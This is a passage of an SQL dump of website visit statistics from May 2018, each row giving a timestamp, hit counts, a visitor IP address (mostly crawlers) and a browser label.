,7,0,0,'151.80.41.169','other'),(242477,1525840387,1,1,0,0,'54.36.148.69','other'),(242478,1525840538,1,1,0,0,'54.36.149.67','other'),(242479,1525840576,1,1,0,0,'54.36.148.252','other'),(242480,1525841099,1,1,0,0,'54.36.149.77','other'),(242481,1525841660,1,1,0,0,'180.76.15.153','other'),(242482,1525841829,1,1,0,0,'8.29.198.27','other'),(242483,1525841962,1,1,0,0,'54.36.148.148','other'),(242484,1525842192,1,1,0,0,'54.36.148.49','other'),(242485,1525842332,1,1,0,0,'54.36.148.129','other'),(242486,1525842588,1,1,0,0,'109.254.254.6','chrome'),(242487,1525842618,1,1,0,0,'178.154.171.88','other'),(242488,1525842743,1,1,0,0,'54.36.148.63','other'),(242489,1525842837,1,1,0,0,'54.36.149.15','other'),(242490,1525842907,1,1,0,0,'54.36.148.168','other'),(242491,1525843134,1,1,0,0,'54.36.148.160','other'),(242492,1525843266,1,1,0,0,'54.36.149.95','other'),(242493,1525843297,1,1,0,0,'54.36.148.90','other'),(242494,1525843392,1,1,0,0,'54.36.148.153','other'),(242495,1525843519,1,1,0,0,'54.36.148.35','other'),(242496,1525843624,1,1,0,0,'141.8.142.74','other'),(242497,1525843984,1,1,0,0,'54.36.148.96','other'),(242498,1525844206,1,1,0,0,'54.36.148.86','other'),(242499,1525844298,1,1,0,0,'54.36.148.79','other'),(242500,1525844341,1,1,0,0,'54.36.148.223','other'),(242501,1525844421,1,1,0,0,'54.36.148.76','other'),(242502,1525844875,1,1,0,0,'91.196.178.14','chrome'),(242503,1525844896,1,1,0,0,'54.36.149.13','other'),(242504,1525844952,1,1,0,0,'54.36.148.126','other'),(242505,1525844981,1,1,0,0,'54.36.148.92','other'),(242506,1525845037,2,2,0,0,'141.8.142.74','other'),(242507,1525845366,1,1,0,0,'54.36.148.233','other'),(242508,1525845515,1,1,0,0,'54.36.148.17','other'),(242509,1525845946,1,1,0,0,'54.36.148.27','other'),(242510,1525846007,3,3,0,0,'141.8.142.74','other'),(242511,1525846014,1,1,0,0,'54.36.148.33','other'),(242512,1525846131,1,1,0,0,'91.196.178.167','chrome'),(242513,1525846259,1,1,0,0,'54.36.149.36','other'),(242514,1525846265,1,1,0,0,'54.36.148.89','other'),(242515,1525846345,1,1,0,0,'54.36.149.62','other'),(242516,1525846413,1,1,0,0,'54.36.148.39','other'),(242517,1525846878,1,1,0,0,'54.36.148.226','other'),(242518,1525847063,1,1,0,0,'217.69.133.6','other'),(242519,1525847132,1,1,0,0,'178.154.171.88','other'),(242520,1525847150,1,1,0,0,'8.29.198.27','other'),(242521,1525847434,1,0,1,0,'66.249.66.155',''),(242522,1525847475,1,1,0,0,'54.36.148.36','other'),(242523,1525847737,1,1,0,0,'54.36.148.117','other'),(242524,1525847772,1,1,0,0,'54.36.148.178','other'),(242525,1525848129,1,1,0,0,'54.36.148.203','other'),(242526,1525848188,1,1,0,0,'54.36.148.147','other'),(242527,1525848279,1,1,0,0,'54.36.148.182','other'),(242528,1525848303,1,1,0,0,'178.154.171.88','other'),(242529,1525848525,1,1,0,0,'185.105.89.38','firefox'),(242530,1525848618,1,1,0,0,'54.36.149.5','other'),(242531,1525848769,1,1,0,0,'54.36.148.23','other'),(242532,1525849004,3,3,0,0,'141.8.142.74','other'),(242533,1525849458,2,2,0,0,'178.154.171.88','other'),(242534,1525849575,1,1,0,0,'54.36.148.234','other'),(242535,1525849956,1,1,0,0,'54.36.149.64','other'),(242536,1525850167,1,1,0,0,'54.36.148.68','other'),(242537,1525850391,1,1,0,0,'54.36.148.77','other'),(242538,1525851074,1,1,0,0,'54.36.149.92','other'),(242539,1525851098,1,1,0,0,'54.36.148.161','other'),(242540,1525851258,3,3,0,0,'52.173.28.45','other'),(242541,1525851312,1,1,0,0,'91.196.178.52','chrome'),(242542,1525851349,1,1,0,0,'178.255.215.94','other'),(242543,1525851367,1,0,1,0,'66.249.66.76',''),(242544,1525851869,2,2,0,0,'141.8.142.74','other'),(242545,1525852084,1,1,0,0,'54.36.149.18','other'),(242546,1525852343,1,1,0,0,'54.36.149.39','other'),(242547,1525852451,1,1,0,0,'54.36.148.60','other'),(242548,1525852667,1,1,0,0,'8.29.198.27','other'),(242549,1525852860,1,1,0,0,'141.8.132.19','other'),(242550,1525853459,1,1,0,0,'54.36.148.131','other'),(242551,1525853479,1,1,0,0,'54.36.148.78','other'),(242552,1525853521,1,1,0,0,'54.36.148.173','other'),(242553,1525853875,1,1,0,0,'54.36.148.176','other'),(242554,1525854419,1,1,0,0,'54.36.149.89','other'),(242555,1525854443,1,1,0,0,'54.36.149.102','other'),(242556,1525854779,1,1,0,0,'54.36.149.72','other'),(242557,1525854845,1,1,0,0,'54.36.149.57','other'),(242558,1525855056,1,1,0,0,'216.244.66.237','other'),(242559,1525855290,1,1,0,0,'207.46.13.140','other'),(242560,1525855401,1,1,0,0,'54.36.148.231','other'),(242561,1525855542,1,1,0,0,'54.36.149.88','other'),(242562,1525855563,1,1,0,0,'178.154.171.88','other'),(242563,1525855595,1,1,0,0,'54.36.148.65','other'),(242564,1525855596,1,1,0,0,'54.36.149.85','other'),(242565,1525855739,1,1,0,0,'91.196.177.46','chrome'),(242566,1525855968,1,1,0,0,'54.36.148.217','other'),(242567,1525856163,1,1,0,0,'54.36.148.251','other'),(242568,1525856402,2,2,0,0,'141.8.142.74','other'),(242569,1525857051,1,1,0,0,'54.36.149.86','other'),(242570,1525857251,1,1,0,0,'46.161.9.39','chrome'),(242571,1525857429,1,1,0,0,'54.36.148.138','other'),(242572,1525857558,1,1,0,0,'54.36.149.4','other'),(242573,1525857614,1,1,0,0,'54.36.148.102','other'),(242574,1525857615,2,2,0,0,'141.8.142.74','other'),(242575,1525857714,1,1,0,0,'162.210.196.97','other'),(242576,1525857901,1,1,0,0,'54.36.148.109','other'),(242577,1525857990,1,1,0,0,'8.29.198.27','other'),(242578,1525858097,1,1,0,0,'54.36.148.191','other'),(242579,1525858353,1,1,0,0,'54.36.148.207','other'),(242580,1525858634,1,1,0,0,'54.36.148.133','other'),(242581,1525858699,1,1,0,0,'193.106.30.99','firefox'),(242582,1525858826,1,1,0,0,'54.36.148.102','other'),(242583,1525858934,1,1,0,0,'178.154.171.88','other'),(242584,1525858942,1,1,0,0,'54.36.148.250','other'),(242585,1525859174,1,1,0,0,'54.36.149.62','other'),(242586,1525859253,1,1,0,0,'54.36.148.29','other'),(242587,1525859411,1,1,0,0,'54.36.148.110','other'),(242588,1525859994,2,2,0,0,'141.8.142.74','other'),(242589,1525860104,1,1,0,0,'178.154.171.88','other'),(242590,1525860167,1,1,0,0,'54.36.148.153','other'),(242591,1525860287,1,1,0,0,'54.36.149.68','other'),(242592,1525860413,1,1,0,0,'54.36.148.135','other'),(242593,1525860418,1,1,0,0,'54.36.149.77','other'),(242594,1525860827,1,1,0,0,'178.92.84.197','chrome'),(242595,1525861260,1,0,1,0,'66.249.66.156',''),(242596,1525861512,1,1,0,0,'54.36.149.84','other'),(242597,1525861527,1,1,0,0,'54.36.148.161','other'),(242598,1525861538,1,1,0,0,'54.36.148.131','other'),(242599,1525861619,1,1,0,0,'141.8.142.74','other'),(242600,1525861678,1,1,0,0,'54.36.149.91','other'),(242601,1525861687,1,1,0,0,'54.36.148.175','other'),(242602,1525861777,1,1,0,0,'54.36.148.127','other'),(242603,1525862080,1,1,0,0,'204.79.180.9','msie'),(242604,1525862360,1,1,0,0,'66.249.66.156','chrome'),(242605,1525862937,1,1,0,0,'54.36.149.32','other'),(242606,1525863123,1,1,0,0,'178.154.171.88','other'),(242607,1525863250,1,1,0,0,'216.244.66.237','other'),(242608,1525863290,1,1,0,0,'54.36.148.135','other'),(242609,1525863462,1,1,0,0,'54.36.148.132','other'),(242610,1525863503,1,1,0,0,'8.29.198.27','other'),(242611,1525863892,1,1,0,0,'54.36.149.94','other'),(242612,1525863923,1,1,0,0,'54.36.148.69','other'),(242613,1525864041,1,1,0,0,'180.76.15.157','other'),(242614,1525864077,1,1,0,0,'141.8.142.74','other'),(242615,1525864146,1,1,0,0,'54.36.149.100','other'),(242616,1525864676,1,1,0,0,'54.36.148.11','other'),(242617,1525864849,1,1,0,0,'46.161.9.39','chrome'),(242618,1525864898,1,0,1,0,'66.249.66.157',''),(242619,1525865180,1,1,0,0,'54.36.149.63','other'),(242620,1525865496,1,1,0,0,'54.36.149.27','other'),(242621,1525865846,1,1,0,0,'54.36.148.52','other'),(242622,1525865873,1,1,0,0,'54.36.148.149','other'),(242623,1525865934,1,1,0,0,'54.36.148.125','other'),(242624,1525866057,1,1,0,0,'54.36.149.82','other'),(242625,1525866060,3,3,0,0,'141.8.142.74','other'),(242626,1525866144,1,1,0,0,'54.36.148.249','other'),(242627,1525866160,1,1,0,0,'54.36.148.61','other'),(242628,1525866247,1,1,0,0,'54.36.148.71','other'),(242629,1525866300,1,1,0,0,'54.36.148.82','other'),(242630,1525866623,1,1,0,0,'54.36.149.23','other'),(242631,1525866713,1,1,0,0,'207.46.13.140','other'),(242632,1525866798,1,1,0,0,'54.36.149.94','other'),(242633,1525867101,1,1,0,0,'54.36.148.177','other'),(242634,1525867181,1,1,0,0,'157.55.39.200','other'),(242635,1525867227,1,1,0,0,'54.36.149.73','other'),(242636,1525867333,1,1,0,0,'216.244.66.237','other'),(242637,1525867647,1,1,0,0,'54.36.149.65','other'),(242638,1525868078,1,1,0,0,'54.36.148.28','other'),(242639,1525868156,1,1,0,0,'54.36.149.98','other'),(242640,1525868284,1,1,0,0,'54.36.148.172','other'),(242641,1525868349,2,2,0,0,'37.73.207.135','chrome'),(242642,1525868391,1,1,0,0,'54.36.148.77','other'),(242643,1525868433,1,1,0,0,'54.36.148.27','other'),(242644,1525868494,1,1,0,0,'54.36.148.177','other'),(242645,1525868610,1,1,0,0,'91.196.178.39','chrome'),(242646,1525868850,1,1,0,0,'8.29.198.26','other'),(242647,1525868953,3,3,0,0,'141.8.142.74','other'),(242648,1525869061,1,1,0,0,'54.36.148.32','other'),(242649,1525869469,1,1,0,0,'54.36.148.108','other'),(242650,1525869489,1,1,0,0,'54.36.148.26','other'),(242651,1525869588,1,1,0,0,'54.36.148.37','other'),(242652,1525869603,1,1,0,0,'54.36.148.82','other'),(242653,1525869654,1,1,0,0,'178.154.171.88','other'),(242654,1525869985,3,3,0,0,'141.8.142.74','other'),(242655,1525870350,2,2,0,0,'91.196.178.37','chrome'),(242656,1525870394,1,1,0,0,'54.36.149.33','other'),(242657,1525871447,1,1,0,0,'178.154.171.88','other'),(242658,1525871491,1,1,0,0,'91.196.178.97','chrome'),(242659,1525872093,1,1,0,0,'54.36.148.236','other'),(242660,1525872134,1,1,0,0,'54.36.148.26','other'),(242661,1525872184,1,1,0,0,'180.76.15.144','other'),(242662,1525872262,1,1,0,0,'54.36.149.32','other'),(242663,1525872557,1,1,0,0,'37.9.113.115','other'),(242664,1525872573,1,1,0,0,'54.36.149.2','other'),(242665,1525872584,1,1,0,0,'54.36.148.206','other'),(242666,1525872940,1,1,0,0,'54.36.148.84','other'),(242667,1525872956,1,1,0,0,'178.154.171.88','other'),(242668,1525872984,1,1,0,0,'54.36.148.240','other'),(242669,1525873558,1,1,0,0,'54.36.148.177','other'),(242670,1525873654,1,1,0,0,'54.36.148.171','other'),(242671,1525873710,1,1,0,0,'54.36.148.130','other'),(242672,1525873951,1,1,0,0,'66.249.66.157','chrome'),(242673,1525873993,1,1,0,0,'54.36.149.82','other'),(242674,1525874075,1,1,0,0,'54.36.148.72','other'),(242675,1525874249,1,1,0,0,'178.154.171.88','other'),(242676,1525874270,1,1,0,0,'141.8.142.74','other'),(242677,1525874347,1,1,0,0,'8.29.198.25','other'),(242678,1525874606,1,1,0,0,'54.36.149.46','other'),(242679,1525875255,1,1,0,0,'54.36.149.54','other'),(242680,1525875298,2,2,0,0,'91.196.178.166','chrome'),(242681,1525875622,1,1,0,0,'54.36.149.28','other'),(242682,1525875680,1,1,0,0,'54.36.148.169','other'),(242683,1525876096,1,1,0,0,'54.36.148.74','other'),(242684,1525876108,1,1,0,0,'54.36.149.26','other'),(242685,1525876141,1,1,0,0,'217.69.133.4','other'),(242686,1525876468,1,0,1,0,'66.249.66.156',''),(242687,1525876801,1,1,0,0,'37.9.113.182','other'),(242688,1525878771,1,1,0,0,'217.69.133.67','other'),(242689,1525879127,2,2,0,0,'141.8.142.74','other'),(242690,1525879171,1,1,0,0,'178.154.171.88','other'),(242691,1525879702,1,1,0,0,'8.29.198.27','other'),(242692,1525880031,1,1,0,0,'13.56.232.243','chrome'),(242693,1525880212,1,1,0,0,'141.8.142.74','other'),(242694,1525880364,1,1,0,0,'54.36.148.151','other'),(242695,1525880500,2,2,0,0,'54.165.59.7','other'),(242696,1525880556,1,1,0,0,'54.36.149.95','other'),(242697,1525880819,1,1,0,0,'54.36.148.157','other'),(242698,1525880820,1,1,0,0,'178.154.171.88','other'),(242699,1525880822,1,1,0,0,'54.36.149.7','other'),(242700,1525880833,1,1,0,0,'54.36.148.90','other'),(242701,1525881058,1,1,0,0,'54.36.148.81','other'),(242702,1525881082,1,1,0,0,'54.36.148.196','other'),(242703,1525881145,1,1,0,0,'91.196.178.16','chrome'),(242704,1525881239,1,1,0,0,'141.8.142.74','other'),(242705,1525881321,1,1,0,0,'216.244.66.237','other'),(242706,1525881503,1,1,0,0,'54.36.149.93','other'),(242707,1525881557,1,1,0,0,'193.106.30.99','firefox'),(242708,1525881587,1,1,0,0,'54.36.148.201','other'),(242709,1525882101,1,1,0,0,'54.36.148.227','other'),(242710,1525882240,1,1,0,0,'54.165.59.7','other'),(242711,1525882280,1,1,0,0,'54.36.149.6','other'),(242712,1525882377,1,1,0,0,'91.196.178.97','chrome'),(242713,1525882923,1,1,0,0,'178.154.171.88','other'),(242714,1525883839,2,2,0,0,'141.8.142.74','other'),(242715,1525885117,1,1,0,0,'37.73.235.127','chrome'),(242716,1525885190,1,1,0,0,'8.29.198.27','other'),(242717,1525885677,1,1,0,0,'178.154.171.88','other'),(242718,1525886417,1,1,0,0,'91.196.178.46','chrome'),(242719,1525886542,1,1,0,0,'77.111.244.15','chrome'),(242720,1525886836,1,1,0,0,'54.165.59.7','other'),(242721,1525887709,1,1,0,0,'178.154.171.88','other'),(242722,1525888337,1,1,0,0,'178.154.171.10','other'),(242723,1525888826,1,1,0,0,'178.154.171.88','other'),(242724,1525889279,2,2,0,0,'37.54.114.62','chrome'),(242725,1525889780,2,2,0,0,'178.154.171.88','other'),(242726,1525890494,1,1,0,0,'91.196.178.103','firefox'),(242727,1525890545,1,1,0,0,'8.29.198.26','other'),(242728,1525891417,3,3,0,0,'141.8.142.74','other'),(242729,1525892230,1,1,0,0,'77.111.244.67','chrome'),(242730,1525892630,1,1,0,0,'178.154.171.88','other'),(242731,1525893204,1,1,0,0,'54.36.149.90','other'),(242732,1525893220,1,1,0,0,'217.69.133.203','other'),(242733,1525893350,1,1,0,0,'54.36.148.164','other'),(242734,1525893613,1,1,0,0,'216.244.66.237','other'),(242735,1525893648,1,1,0,0,'54.36.148.173','other'),(242736,1525893687,1,1,0,0,'54.36.148.219','other'),(242737,1525893857,1,1,0,0,'54.36.148.149','other'),(242738,1525893900,1,1,0,0,'54.36.148.117','other'),(242739,1525894165,3,3,0,0,'178.154.171.88','other'),(242740,1525894525,1,1,0,0,'54.36.149.51','other'),(242741,1525894630,1,1,0,0,'54.36.148.66','other'),(242742,1525894688,11,11,0,0,'23.237.4.26','other'),(242743,1525894712,1,1,0,0,'46.161.9.39','firefox'),(242744,1525894948,1,1,0,0,'54.36.148.142','other'),(242745,1525895118,1,1,0,0,'178.154.171.88','other'),(242746,1525895258,1,1,0,0,'54.36.148.50','other'),(242747,1525895430,1,1,0,0,'54.36.148.233','other'),(242748,1525895547,1,1,0,0,'54.36.148.193','other'),(242749,1525895676,1,1,0,0,'54.36.148.24','other'),(242750,1525895774,1,1,0,0,'54.36.148.253','other'),(242751,1525895795,1,1,0,0,'37.9.113.182','other'),(242752,1525895977,1,1,0,0,'54.36.148.73','other'),(242753,1525896029,1,1,0,0,'8.29.198.26','other'),(242754,1525896440,1,1,0,0,'54.36.149.57','other'),(242755,1525896618,1,1,0,0,'54.36.149.44','other'),(242756,1525897010,1,1,0,0,'54.36.149.65','other'),(242757,1525897938,1,1,0,0,'54.36.148.238','other'),(242758,1525898032,1,0,1,0,'66.249.66.157',''),(242759,1525898146,1,1,0,0,'37.9.113.110','other'),(242760,1525898148,1,1,0,0,'37.9.113.115','other'),(242761,1525898159,1,1,0,0,'87.250.224.46','other'),(242762,1525898417,1,1,0,0,'54.36.148.230','other'),(242763,1525898986,1,1,0,0,'54.36.148.176','other'),(242764,1525899299,1,1,0,0,'54.36.148.69','other'),(242765,1525899323,1,1,0,0,'180.76.15.5','other'),(242766,1525899367,1,1,0,0,'40.77.167.177','other'),(242767,1525899718,1,1,0,0,'54.36.149.1','other'),(242768,1525899968,1,1,0,0,'54.36.148.161','other'),(242769,1525899991,1,1,0,0,'54.36.148.16','other'),(242770,1525900320,1,1,0,0,'54.36.148.192','other'),(242771,1525900407,1,1,0,0,'54.36.148.200','other'),(242772,1525900592,1,1,0,0,'54.36.148.144','other'),(242773,1525901385,1,1,0,0,'8.29.198.26','other'),(242774,1525901978,1,1,0,0,'207.46.13.140','other'),(242775,1525902103,1,1,0,0,'87.250.224.46','other'),(242776,1525902436,1,1,0,0,'141.8.142.74','other'),(242777,1525905536,1,1,0,0,'193.106.30.99','firefox'),(242778,1525905979,2,2,0,0,'216.244.66.237','other'),(242779,1525906595,1,1,0,0,'54.36.149.16','other'),(242780,1525906704,1,1,0,0,'54.36.148.150','other'),(242781,1525906865,1,1,0,0,'8.29.198.27','other'),(242782,1525906881,1,1,0,0,'54.36.148.36','other'),(242783,1525907038,1,1,0,0,'54.36.148.181','other'),(242784,1525907288,1,1,0,0,'216.244.66.237','other'),(242785,1525907381,1,1,0,0,'54.36.148.199','other'),(242786,1525907496,1,1,0,0,'54.36.148.26','other'),(242787,1525907667,1,1,0,0,'54.36.149.2','other'),(242788,1525907745,1,1,0,0,'217.69.134.161','other'),(242789,1525907752,1,1,0,0,'217.69.133.6','other'),(242790,1525908170,1,1,0,0,'54.36.148.47','other'),(242791,1525908199,1,1,0,0,'54.36.148.73','other'),(242792,1525908261,1,1,0,0,'54.36.148.75','other'),(242793,1525908301,1,1,0,0,'54.36.148.153','other'),(242794,1525908463,1,1,0,0,'54.36.148.190','other'),(242795,1525908554,1,1,0,0,'54.36.148.236','other'),(242797,1525908586,1,1,0,0,'54.36.149.79','other'),(242798,1525908706,1,1,0,0,'180.76.15.147','other'),(242799,1525908925,1,0,1,0,'66.249.66.76',''),(242800,1525909394,1,1,0,0,'141.8.142.74','other'),(242801,1525909732,1,1,0,0,'207.46.13.140','other'),(242802,1525910119,1,1,0,0,'54.36.149.47','other'),(242803,1525910149,1,1,0,0,'54.36.148.103','other'),(242804,1525910737,1,1,0,0,'54.36.148.215','other'),(242805,1525910946,1,1,0,0,'54.36.148.144','other'),(242806,1525911095,1,1,0,0,'207.46.13.140','other'),(242807,1525911193,1,1,0,0,'54.36.148.197','other'),(242808,1525911270,1,1,0,0,'54.36.149.47','other'),(242809,1525911640,1,1,0,0,'54.36.148.11','other'),(242810,1525912233,1,1,0,0,'8.29.198.25','other'),(242811,1525912312,1,1,0,0,'54.36.149.8','other'),(242812,1525912489,1,1,0,0,'54.36.149.19','other'),(242813,1525912706,1,1,0,0,'180.76.15.13','other'),(242814,1525913020,1,1,0,0,'188.255.91.49','msie'),(242815,1525913031,1,1,0,0,'54.36.149.76','other'),(242816,1525913529,1,1,0,0,'54.36.149.15','other'),(242817,1525913573,1,1,0,0,'54.36.148.142','other'),(242818,1525913600,1,1,0,0,'54.36.148.141','other'),(242819,1525913839,1,1,0,0,'141.8.142.74','other'),(242820,1525914075,1,1,0,0,'178.154.171.88','other'),(242821,1525914125,1,1,0,0,'54.36.148.112','other'),(242822,1525914237,1,1,0,0,'54.36.149.107','other'),(242823,1525914449,1,1,0,0,'78.47.80.240','other'),(242824,1525914997,1,1,0,0,'54.36.148.17','other'),(242825,1525915120,1,1,0,0,'54.36.148.59','other'),(242826,1525915276,1,1,0,0,'54.36.148.215','other'),(242827,1525915517,1,1,0,0,'54.36.149.11','other'),(242828,1525916241,1,1,0,0,'54.36.149.49','other'),(242829,1525916255,1,0,1,0,'66.249.66.157',''),(242830,1525916345,1,1,0,0,'54.36.148.255','other'),(242831,1525916470,1,1,0,0,'54.36.148.222','other'),(242832,1525916617,1,1,0,0,'54.36.148.214','other'),(242833,1525916621,1,1,0,0,'54.36.149.26','other'),(242834,1525916840,1,1,0,0,'54.36.148.167','other'),(242835,1525917239,1,1,0,0,'54.36.148.173','other'),(242836,1525917476,1,1,0,0,'54.36.148.183','other'),(242837,1525917699,1,1,0,0,'8.29.198.27','other'),(242838,1525917834,1,1,0,0,'54.36.148.97','other'),(242839,1525917928,1,1,0,0,'54.36.148.234','other'),(242840,1525917988,1,1,0,0,'54.36.148.237','other'),(242841,1525918199,1,1,0,0,'54.36.149.9','other'),(242842,1525918216,1,1,0,0,'216.244.66.237','other'),(242843,1525918225,1,1,0,0,'54.36.148.26','other'),(242844,1525918646,1,1,0,0,'54.36.148.252','other'),(242845,1525918748,1,1,0,0,'54.36.148.205','other'),(242846,1525918885,1,1,0,0,'54.36.148.123','other'),(242847,1525918926,1,1,0,0,'54.36.148.134','other'),(242848,1525918995,1,1,0,0,'40.77.167.177','other'),(242849,1525919017,1,1,0,0,'54.36.148.89','other'),(242850,1525919185,1,1,0,0,'54.36.149.6','other'),(242851,1525919416,1,1,0,0,'54.36.149.61','other'),(242852,1525919693,1,1,0,0,'54.36.149.22','other'),(242853,1525919742,1,1,0,0,'54.36.148.79','other'),(242854,1525919827,1,1,0,0,'54.36.149.31','other'),(242855,1525919832,1,1,0,0,'54.36.149.78','other'),(242856,1525920079,1,1,0,0,'141.8.142.74','other'),(242857,1525920148,1,1,0,0,'54.36.149.66','other'),(242858,1525920434,1,1,0,0,'217.69.133.6','other'),(242859,1525920969,1,1,0,0,'54.36.149.85','other'),(242860,1525921044,1,1,0,0,'54.36.148.180','other'),(242861,1525921087,1,1,0,0,'54.36.148.144','other'),(242862,1525921342,1,1,0,0,'54.36.148.181','other'),(242863,1525921595,1,1,0,0,'79.137.44.22','other'),(242864,1525921799,1,1,0,0,'54.36.148.14','other'),(242865,1525922123,1,1,0,0,'54.36.148.225','other'),(242866,1525922244,1,1,0,0,'141.8.142.74','other'),(242867,1525922297,1,1,0,0,'54.36.148.245','other'),(242868,1525922512,1,1,0,0,'54.36.148.184','other'),(242869,1525922932,1,1,0,0,'54.36.148.19','other'),(242870,1525923074,1,1,0,0,'8.29.198.27','other'),(242871,1525923259,1,1,0,0,'216.244.66.237','other'),(242872,1525923530,1,1,0,0,'54.36.148.16','other'),(242873,1525923779,1,1,0,0,'54.36.148.199','other'),(242874,1525924382,1,1,0,0,'54.36.148.148','other'),(242875,1525924451,1,1,0,0,'46.161.9.39','chrome'),(242876,1525924499,1,1,0,0,'54.36.148.234','other'),(242877,1525924558,1,1,0,0,'54.36.148.187','other'),(242878,1525924685,1,1,0,0,'216.244.66.237','other'),(242879,1525924964,2,2,0,0,'141.8.142.74','other'),(242880,1525925132,1,1,0,0,'54.36.148.101','other'),(242881,1525925601,1,1,0,0,'54.36.148.93','other'),(242882,1525925782,1,1,0,0,'54.36.148.54','other'),(242883,1525925789,1,1,0,0,'54.36.148.206','other'),(242884,1525925829,1,1,0,0,'54.36.149.4','other'),(242885,1525926192,1,1,0,0,'54.36.148.251','other'),(242886,1525926244,1,1,0,0,'54.36.148.38','other'),(242887,1525926326,1,1,0,0,'217.69.133.6','other'),(242888,1525926422,1,1,0,0,'54.36.148.146','other'),(242889,1525926444,1,1,0,0,'54.36.148.69','other'),(242890,1525926546,1,1,0,0,'54.36.148.171','other'),(242891,1525926661,1,1,0,0,'54.36.148.253','other'),(242892,1525926947,1,1,0,0,'54.36.148.184','other'),(242893,1525926981,1,1,0,0,'54.36.148.90','other'),(242894,1525927228,1,1,0,0,'54.36.148.197','other'),(242895,1525927346,1,1,0,0,'207.46.13.11','other'),(242896,1525927376,1,1,0,0,'54.36.148.222','other'),(242897,1525927427,1,1,0,0,'54.36.148.194','other'),(242898,1525927598,1,1,0,0,'54.36.148.149','other'),(242899,1525927655,1,1,0,0,'54.36.148.232','other'),(242900,1525927942,1,1,0,0,'54.36.148.121','other'),(242901,1525927982,1,1,0,0,'54.36.148.108','other'),(242902,1525928204,1,1,0,0,'178.154.171.88','other'),(242903,1525928427,1,1,0,0,'54.36.148.132','other'),(242904,1525928524,1,1,0,0,'8.29.198.27','other'),(242905,1525928578,1,1,0,0,'141.8.142.74','other'),(242906,1525928592,1,1,0,0,'54.36.148.48','other'),(242907,1525928651,1,1,0,0,'54.36.148.112','other'),(242908,1525928830,1,1,0,0,'54.36.149.38','other'),(242909,1525928870,2,2,0,0,'37.54.114.62','chrome'),(242910,1525928917,1,1,0,0,'54.36.149.102','other'),(242911,1525929095,1,1,0,0,'193.106.30.99','firefox'),(242912,1525929429,1,1,0,0,'54.36.148.237','other'),(242913,1525929552,1,1,0,0,'54.36.148.67','other'),(242914,1525929668,1,1,0,0,'54.36.149.56','other'),(242915,1525929718,1,1,0,0,'91.196.178.81','chrome'),(242916,1525929876,1,1,0,0,'91.196.177.46','chrome'),(242917,1525929935,1,1,0,0,'54.36.148.79','other'),(242918,1525930268,1,1,0,0,'54.36.149.23','other'),(242919,1525931284,1,1,0,0,'178.154.200.41','other'),(242921,1525931578,1,1,0,0,'163.172.4.153','chrome'),(242922,1525931685,1,1,0,0,'91.196.178.89','chrome'),(242923,1525931770,1,0,1,0,'66.249.66.156',''),(242924,1525932008,1,1,0,0,'54.36.149.32','other'),(242925,1525932078,1,1,0,0,'54.36.149.48','other'),(242926,1525932106,1,1,0,0,'54.36.149.79','other'),(242927,1525932122,5,5,0,0,'91.196.178.67','chrome'),(242928,1525932557,1,1,0,0,'95.132.49.203','firefox'),(242929,1525932881,1,1,0,0,'54.36.148.161','other'),(242930,1525933031,1,1,0,0,'141.8.142.74','other'),(242931,1525933037,1,0,1,0,'66.249.66.155',''),(242932,1525933147,1,1,0,0,'54.36.148.168','other'),(242933,1525933263,1,1,0,0,'54.36.148.255','other'),(242934,1525933303,1,1,0,0,'54.36.149.105','other'),(242935,1525933410,1,1,0,0,'178.154.171.88','other'),(242936,1525933545,1,1,0,0,'54.36.148.244','other'),(242937,1525933720,1,1,0,0,'54.36.149.106','other'),(242938,1525933786,2,2,0,0,'91.196.178.169','chrome'),(242939,1525933867,1,1,0,0,'54.36.148.28','other'),(242940,1525933918,1,1,0,0,'8.29.198.26','other'),(242941,1525933929,1,1,0,0,'95.135.15.181','chrome'),(242942,1525933950,1,1,0,0,'54.36.148.41','other'),(242943,1525933993,1,1,0,0,'54.36.148.254','other'),(242944,1525934530,1,1,0,0,'54.36.148.12','other'),(242945,1525934671,1,1,0,0,'54.36.148.189','other'),(242946,1525934794,1,1,0,0,'178.95.43.161','chrome'),(242947,1525934919,1,1,0,0,'54.36.148.40','other'),(242948,1525935266,1,1,0,0,'91.196.178.133','firefox'),(242949,1525935286,1,1,0,0,'46.161.9.39','chrome'),(242950,1525935343,1,1,0,0,'54.36.149.41','other'),(242951,1525935551,1,1,0,0,'54.36.149.31','other'),(242952,1525935627,1,1,0,0,'54.36.148.205','other'),(242953,1525935847,1,1,0,0,'82.196.9.227','chrome'),(242954,1525935930,1,1,0,0,'54.36.148.78','other'),(242955,1525936024,1,1,0,0,'54.36.148.148','other'),(242956,1525936452,1,1,0,0,'54.36.148.101','other'),(242957,1525936487,1,1,0,0,'54.36.149.42','other'),(242958,1525936555,1,1,0,0,'37.139.25.8','chrome'),(242959,1525936784,1,1,0,0,'54.36.149.32','other'),(242960,1525936785,1,1,0,0,'54.36.148.202','other'),(242961,1525937017,1,1,0,0,'54.36.148.95','other'),(242962,1525937104,1,1,0,0,'37.53.251.180','firefox'),(242963,1525937379,1,1,0,0,'54.36.148.148','other'),(242964,1525937847,1,1,0,0,'54.36.149.18','other'),(242965,1525938060,1,1,0,0,'54.36.148.252','other'),(242966,1525938088,1,1,0,0,'54.36.149.72','other'),(242967,1525938144,1,1,0,0,'54.36.149.3','other'),(242968,1525938209,1,1,0,0,'54.36.148.65','other'),(242969,1525938647,1,1,0,0,'54.36.148.78','other'),(242970,1525938731,1,1,0,0,'54.36.148.179','other'),(242971,1525938753,1,1,0,0,'141.8.142.74','other'),(242972,1525938776,1,1,0,0,'216.244.66.237','other'),(242973,1525938930,1,1,0,0,'54.36.148.140','other'),(242974,1525938981,1,1,0,0,'37.73.213.158','chrome'),(242975,1525939104,1,1,0,0,'91.210.116.146','chrome'),(242976,1525939365,1,1,0,0,'8.29.198.27','other'),(242977,1525939425,1,1,0,0,'91.196.177.46','chrome'),(242978,1525939549,1,1,0,0,'54.36.149.48','other'),(242979,1525939701,1,1,0,0,'54.36.149.97','other'),(242980,1525939734,1,1,0,0,'178.154.171.88','other'),(242981,1525939738,1,1,0,0,'141.8.142.74','other'),(242982,1525939787,1,1,0,0,'54.36.148.215','other'),(242983,1525940061,1,1,0,0,'54.36.149.16','other'),(242984,1525940096,1,1,0,0,'37.55.150.47','chrome'),(242985,1525940399,1,1,0,0,'178.94.173.156','chrome'),(242986,1525940707,1,1,0,0,'54.36.149.32','other'),(242987,1525940711,1,0,1,0,'66.249.66.157',''),(242988,1525940902,2,2,0,0,'91.196.178.16','chrome'),(242989,1525941549,2,2,0,0,'91.196.178.67','chrome'),(242990,1525941579,1,1,0,0,'178.94.173.156','chrome'),(242991,1525941580,1,1,0,0,'46.175.84.20','chrome'),(24299